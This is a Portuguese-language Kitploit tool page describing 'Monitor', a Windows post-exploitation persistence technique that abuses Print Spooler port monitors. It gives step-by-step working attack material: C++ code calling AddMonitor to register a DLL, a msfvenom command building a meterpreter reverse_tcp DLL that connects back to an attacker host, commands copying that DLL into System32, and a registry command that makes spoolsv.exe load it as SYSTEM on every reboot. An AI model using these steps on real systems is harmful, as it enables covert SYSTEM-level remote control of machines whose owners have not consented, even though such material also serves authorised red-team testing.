Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Monitor — Uma forma antiga de Persistência | Kitploit
Ferramentas/GitHubGitHub/al1ex/monitor
Escalada de PrivilégiosGeração de PayloadsMecanismos de PersistênciaExploraçãoPós-ExploraçãoComando e ControleRed Teaming
GitHubal1ex/monitor

Monitor

Uma forma antiga de Persistência

Ver Repositório
531013há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Descrição do Projeto

Utilizado para manter privilégios durante a fase de pós-exploração.

Utilização do Projeto

Passo 1: Baixe este projeto e, em seguida, use o VS para compilar o Monitor.cpp. Claro, você também pode usar o já compilado. O código do Monitor.cpp é o seguinte:

#include "Windows.h"

int main() {
	MONITOR_INFO_2 monitorInfo;
	TCHAR env[12] = TEXT("Windows x64");
	TCHAR name[12] = TEXT("Monitor");
	TCHAR dll[12] = TEXT("test.dll");
	monitorInfo.pName = name;
	monitorInfo.pEnvironment = env;
	monitorInfo.pDLLName = dll;
	AddMonitor(NULL, 2, (LPBYTE)&monitorInfo);
	return 0;
}
  • pName // nome do monitor
  • pEnvironment // arquitetura do ambiente
  • pDLLName // nome do arquivo DLL do monitor

Passo 2: Use o Msfvenom para gerar o payload de ataque DLL:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.188.129 LPORT=4444 -f dll > shell.dll

test_dll

Passo 3: Copie o shell.dll para o diretório system32 do host de destino e renomeie-o para test.dll (ou seja, o pDLLName acima; você também pode alterá-lo para o nome que preferir, fica a seu critério):

copy C:\temp\shell.dll C:\Windows\System32\test.dll

copy

Passo 4: Em seguida, entre no diretório system32 e execute o seguinte comando (o Monitors.exe é o arquivo compilado anteriormente e também precisa ser colocado no diretório system32):

Monitors.exe

Monitor

Passo 5: Depois disso, a sessão do Meterpreter é recebida com sucesso.

Meterpreter

Implementação da Persistência

Para implementar a persistência, precisamos definir uma chave no local do registro "Monitors":

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Monitors

Em seguida, execute o seguinte comando no prompt de comando para criar uma entrada de registro que conterá o valor test.dll. Verifique no editor se a chave foi criada:

reg add "hklm\system\currentcontrolset\control\print\monitors\Pentestlab" /v "Driver" /d "test.dll" /t REG_SZ

regedit

Na próxima reinicialização, o processo spoolsv.exe carregará todos os arquivos DLL de driver que existem na chave de registro Monitors e estão armazenados na pasta System32 do Windows. A imagem abaixo demonstra que a sessão do Meterpreter foi estabelecida com o mesmo nível de privilégio do serviço Print Spooler (SYSTEM) e foi executada a partir da pasta System32.

shell

Baixar ferramenta